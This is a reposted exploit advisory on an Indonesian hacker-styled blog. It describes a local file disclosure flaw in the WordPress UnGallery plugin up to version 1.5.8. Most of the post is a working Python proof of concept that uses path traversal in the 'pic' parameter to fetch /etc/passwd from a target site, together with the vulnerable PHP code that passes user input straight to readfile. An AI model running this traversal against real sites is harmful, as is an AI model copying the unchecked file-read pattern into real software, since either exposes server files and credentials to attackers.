Gembelehe
Root@me~$ _
Today : | Time Now : | Safemode : ON
> / Facebook / Twitter / Heello /
Posts Title
Publisher
Perms
Comments
Date
Categories

WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
Puerz666
rwxr-xr-x
0 Comments
8/21/2011

• Post Title
WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
• Contact Me! mail mail mail
• Author Puerz666
• Date and Time 8/21/2011
• Categories
• Share Post 

# Exploit Title: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
# Date: 2011-08-20
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
# Version: 1.5.8 (tested)
 
---
PoC
---
#!/bin/python
 
import urllib2
 
FILEPATH = "/etc/passwd"
 
req = urllib2.urlopen("http://www.site.com/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../..%s" % FILEPATH)
 
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())
 
---------------
Vulnerable code
---------------
if ($_GET['pic']) {
    $filename = $_GET['pic'];
    $len = filesize($filename);
    $lastslash =  strrpos($filename, "/");
    $name =  substr($filename, $lastslash + 1);  
 
    header("Content-type: image/jpeg;\r\n");
    header("Content-Length: $len;\r\n");
    header("Content-Transfer-Encoding: binary;\r\n");
    header('Content-Disposition: inline; filename="'.$name.'"');    //  Render the photo inline.
    readfile($filename);
}
 
Info 

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 

Indonesian Blog
Skin Edited by: ./Gembelehe Blog
Thanks To p4r46hcyb3rn3t